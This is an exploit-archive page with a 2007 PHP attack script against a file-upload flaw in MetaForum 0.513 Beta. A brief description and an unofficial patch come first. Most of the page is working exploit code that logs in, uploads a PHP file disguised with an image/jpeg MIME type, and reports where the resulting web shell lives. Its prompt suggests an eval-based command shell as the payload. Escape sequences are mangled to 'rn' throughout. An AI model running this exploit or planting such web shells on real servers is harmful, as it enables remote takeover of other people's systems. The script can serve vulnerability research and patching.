MetaForum <= 0.513 Beta Remote File Upload Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MetaForum <= 0.513 Beta Remote File Upload Exploit
# Published : 2007-03-19
# Author : Gu1ll4um3r0m41n
# Previous Title : AssetMan <= 2.4a (download_pdf.php) Remote File Disclosure Vuln
# Next Title : PHP-Nuke Module splattforum 4.0 RC1 Local File Inclusion Exploit
<?php
/*---------------------------------------------------------*
MetaForum <= 0.513 Beta - Remote file upload Vulnerability

[|Description:|]
A security bug has been discovered in MetaForum 0.513 Beta.
This bug can be used by an attacker to upload a malicious php file on the server.
During the upload, the MIME type of the file is the only verified parameter. The extention isn't.
This enables a attacker to fake the MIME type of a php file so that it is considered as an image.

[|Advisory:|]
http://www.aeroxteam.fr/advisory-MetaForum-0.513b.txt

[|Solution:|] (unofficial)
Replace line 110 in the file usercp.php by:
if (($_FILES['imagefile']['type'] == "image/jpeg" || $_FILES['imagefile']['type'] == "image/pjpeg" || $_FILES['imagefile']['type'] == "image/png" || $_FILES['imagefile']['type'] == "image/gif") && in_array(strtolower(substr(strrchr($_FILES['imagefile']['name'], '.'),1)), array('gif', 'jpg', 'jpeg', 'png')))

C0d3d by Gu1ll4um3r0m41n (aeroxteam --[at]-- gmail --[dot]-- com)
for AeroX & NeoAlpha (AeroXteam.fr -- Neoalpha.fr)
(C)opyleft 2007
Gr33tz: Math., Syntax ERROR, Barma, NeoMorphS, Snake91, Spamm, Kad, Nitr0, Jethro And everybody from #aerox
*---------------------------------------------------------*/
if(count($argv) == 6) {
	head();
	echo "PHP code to write (ex: <?php eval(stripslashes($_GET['cmd'])); ?>) :rn";
	$phpcode = trim(fgets(STDIN));
	echo "rn[+] Connection... ";
	$sock = @fsockopen($argv[1], 80, $eno, $estr, 30);
	if (!$sock) {
		die("FailedrnrnCould not connect to ".$argv[1]." on the port 80 !");
	}
	echo "OKrn";
	echo "[+] Login to account... ";
	$reqlogin = "POST ".$argv[2]."index.php?shard=login&action=proc_login HTTP/1.1rn";
	$reqlogin .= "Host: ".$argv[1]."rn";
	$reqlogin .= "Accept: */*rn";
	$reqlogin .= "Connection: Closern";
	$reqlogin .= "Content-Type: application/x-www-form-urlencodedrn";
	$reqlogin .= "Content-Length: ".strlen("login_name=".$argv[3]."&login_pass=".$argv[4])."rnrn";
	$reqlogin .= "login_name=".$argv[3]."&login_pass=".$argv[4];
	fwrite($sock, $reqlogin);
	while(!feof($sock)) {
		$buffer = fgets($sock);
		if(preg_match("`Set-Cookie: ".$argv[5]."userID=(.*?);`", $buffer, $idtmp)) { $id = $idtmp[1]; }
	}
	if(empty($id)) {
		die("FailedrnrnCould not login as ".$argv[3]." !");
	} else {
		echo "OKrn";
	}
	fclose($sock);

	echo "[+] Sending of the file... ";
	$sock = @fsockopen($argv[1], 80, $eno, $estr, 30);
	if (!$sock) {
		die("FailedrnrnCould not connect to ".$argv[1]." on the port 80 !");
	}
	$requp = "POST ".$argv[2]."index.php?shard=usercp&action=g_avatar HTTP/1.1rn";
	$requp .= "Host: ".$argv[1]."rn";
	$requp .= "Accept: */*rn";
	$requp .= "Connection: Closern";
	$requp .= "Cookie: ".$argv[5]."username=".$argv[3]."; ".$argv[5]."userID=".$id."; ".$argv[5]."password=".sha1($argv[4])."rn";
	$requp .= "Content-Type: multipart/form-data; boundary=--------------268742553814512rn";
	$requp2 .= "----------------268742553814512rn";
	$requp2 .= "Content-Disposition: form-data; name="upload_flag";rnrn";
	$requp2 .= "truern";
	$requp2 .= "----------------268742553814512rn";
	$requp2 .= "Content-Disposition: form-data; name="imagefile"; filename="owned.php";rn";
	$requp2 .= "Content-Type: image/jpegrnrn";
	$requp2 .= $phpcode."rn";
	$requp2 .= "----------------268742553814512rn";
	$requp2 .= "Content-Disposition: form-data; name="Submit";rnrn";
	$requp2 .= "Submitrn";
	$requp2 .= "----------------268742553814512--rn";
	$requp .= "Content-Length: ".strlen($requp2)."rnrn";
	$requp .= $requp2;
	fwrite($sock, $requp);
	while(!feof($sock)) {
		if(preg_match("`<img src='images/".$argv[3].".php'`", fgets($sock))) { $ok = 1; }
	}
	if($ok == 1) {
		echo "OKrnrnYou can access the file at:rnhttp://".$argv[1].$argv[2]."images/".$argv[3].".phprnrnThank for using this exploit !";
	} else {
		die("FailedrnrnMaybe not vulnerable ?!");
	}
} else {
	usage();
}
function usage() {
	echo "+----------------------------------------------------------------+rn";
	echo "|            MetaForum <= 0.513_beta Remote file upload          |rn";
	echo "|             By Gu1ll4um3r0m41n for AeroX & NeoAlpha            |rn";
	echo "| Usage: php exploit.php site.com /path/ user pass cookie_prefix |rn";
	echo "+----------------------------------------------------------------+rn";
}
function head() {
	echo "+----------------------------------------------+rn";
	echo "|  MetaForum <= 0.513_beta Remote file upload  |rn";
	echo "|   By Gu1ll4um3r0m41n for AeroX & NeoAlpha    |rn";
	echo "+----------------------------------------------+rnrn";
}
?>

# www.Syue.com [2007-03-19]